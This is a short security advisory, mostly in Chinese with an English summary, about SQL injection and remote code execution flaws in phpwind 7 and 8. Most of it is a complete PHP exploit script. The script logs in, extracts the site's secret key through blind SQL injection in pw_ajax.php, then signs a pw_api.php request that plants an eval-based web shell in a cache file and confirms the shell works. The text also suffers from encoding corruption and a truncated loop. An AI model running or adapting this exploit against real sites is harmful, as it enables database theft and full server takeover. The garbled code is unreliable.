phpwind 7和8版本存在輸入驗(yàn)證漏洞，攻擊者成功利用該漏洞可以遠(yuǎn)程執(zhí)行任意php代碼。

問(wèn)題存在于pw_ajax.php中，由于用戶提交給fieldname參數(shù)的數(shù)據(jù)缺少充分的過(guò)濾，攻擊者可利用漏洞進(jìn)行SQL注入攻擊獲取任何數(shù)據(jù)庫(kù)里的數(shù)據(jù)。

另外class_other.php中存在一個(gè)任意命令執(zhí)行的漏洞，由于對(duì)$class[cid]輸入缺少充分過(guò)濾，不過(guò)進(jìn)入此邏輯需要一些較為關(guān)鍵的key，借助上面的注射漏洞即可獲得該key。

PHPWind has a sql injection vulnerability, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the “fieldname” Parameter in pw_ajax.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

In addition Input passed to the “$class[cid]” Parameter in class_other.php is not properly sanitised before being used in a SQL query. But in order to reach this logic code need some important key, attacker could exploit above sql injection vulnerability to get key .

測(cè)試代碼

echo ”

Info: Poc for Phpwind遠(yuǎn)程命令執(zhí)行

Test: exploit.php user password http://www.blackxl.org/phpwind/

“;

if($argc<3){

echo “\r\n參數(shù)缺少\r\n”;

die();

}

$user=$argv[1];

$pass=$argv[2];

$pwurl=$argv[3];

$myheader=array(

‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,

‘Accept-Language: zh-cn,zh;q=0.5′,

‘Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7′,

‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8′,

‘Referer: http://www.blackxl.org‘,

‘Connection: Keep-Alive’,

‘Cache-Control: no-cache’,

‘User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)’

);

$cookie=”";

$str=curlsend(“$pwurl/login.php?”,”P(pán)OST”,0,$myheader,”forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC”,1);

preg_match_all(“/Set-Cookie:([^;]+)/is”,$str,$array);

for($i=0;$i

$cookie=$cookie.”;”.$array[1][$i];

}

//echo $cookie;

$test = curlsend(‘$pwurl/pw_ajax.php’,”P(pán)OST”,0,$myheader,”,1);

if(strpos($test,’’)) {

die(‘用戶密碼或者其他參數(shù)錯(cuò)誤’);

}

$shellcode=”action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23″;

$hash=”0123456789abcdef”;

$craked=”";

for($i=0;$i<32;$i++){

for($n=0;$n<16;$n++){

$tmp=str_replace(“{offset}”,bin2hex($craked.$hash[$n]),$shellcode);

$tmp=curlsend(“$pwurl/pw_ajax.php”,”P(pán)OST”,0,$myheader,$tmp,0);

if(strpos($tmp,”pw_config”)){

echo “CrackEd Offset “.($i+1).” :”.$hash[$n].”\r\n”;

$craked=$craked.$hash[$n];

break;

}

}

}

echo “Craked Magicdata :”.$craked.”\r\n”;

echo “Get shell :”;

//another 0day

$arg=”;

$hack = array();

$hack['mode'] = ‘Other’;

$hack['method'] = ‘threadscateGory’;

$hack['params'] = ‘a(chǎn):1:{s:3:”cid”;a:1:{s:3:”cid”;a:1:{s:3:”cid”;s:21:”\’.eval($_GET[c]).\’abc”;}}}’;

$hack['type'] = ‘a(chǎn)pp’;

$hack = strips($hack);

ksort($hack);

reset($hack);

foreach ($hack as $key => $value) {

if ($value && $key != ‘sig’) {

$arg .= “$key=$value&”;

}

}

$arg.=’sig=’.md5($arg.$craked);

echo file_get_contents(“$pwurl/pw_api.php?”.$arg);

echo “OK\r\n”;

$str=file_get_contents(“$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;”);

if(strpos($str,’wooyun’)){

echo “Got shell :”.”$pwurl/data/bbscache/info_class.php?c=phpinfo();”;

echo “\r\nOver!”;

}

function strips($param) {

if (is_array($param)) {

foreach ($param as $key => $value) {

$param[$key] = strips($value);

}

} else {

$param = stripslashes($param);

}

return $param;

}

function curlsend($url,$method=false,$ssl=0,$myheader,$data=”,$header=0){

global $cookie;

$ch = curl_init();

$timeout = 0; // set to zero for no timeout

curl_setopt ($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_POST, $method);

curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

if($data){

curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);

}

curl_setopt ($ch, CURLOPT_HEADER, $header);

if($ssl){

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

}

$handles = curl_exec($ch);

curl_close($ch);

//echo $handles;

return $handles;

}

關(guān)健詞：phpwind，遠(yuǎn)程代碼